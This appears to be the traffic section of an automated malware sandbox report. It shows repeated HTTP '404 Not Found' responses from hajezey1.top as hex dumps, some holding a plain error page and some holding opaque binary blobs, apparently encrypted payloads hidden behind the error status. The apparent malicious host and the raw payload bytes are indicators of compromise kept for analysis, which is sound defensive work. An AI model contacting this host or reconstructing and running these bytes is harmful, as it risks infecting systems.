Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:09:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:09:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 81 71 e5 77 8f 8c f5 cf 9b 2b 25 9b f6 ba c9 1b b0 1c 67 74 d2 a5 98 87 cd 2b 80 78 51 a1 a2 8f bc 82 df 1c e0 32 02 50 08 88 d8 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 01 82 20 59 55 11 5c 2c 34 67 ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 01 75 cb 8a 40 d8 06 0e 45 07 13 7d 7b f9 e0 04 89 f9 d4 57 80 90 70 89 ec be 4a 6b 0e e1 a2 22 48 92 d2 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 53 68 58 96 da 19 d1 3a 2d e8 43 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 65 85 4a 04 38 ad 7f 14 2c d0 e8 b1 14 23 71 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 62 41 64 cd 25 5c 8d b7 f5 23 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 75 8d b5 be 34 56 9b 46 76 99 86 11 00 83 32 42 92 51 ce ae b8 6b 95 36 e1 48 52 67 76 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 12:10:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 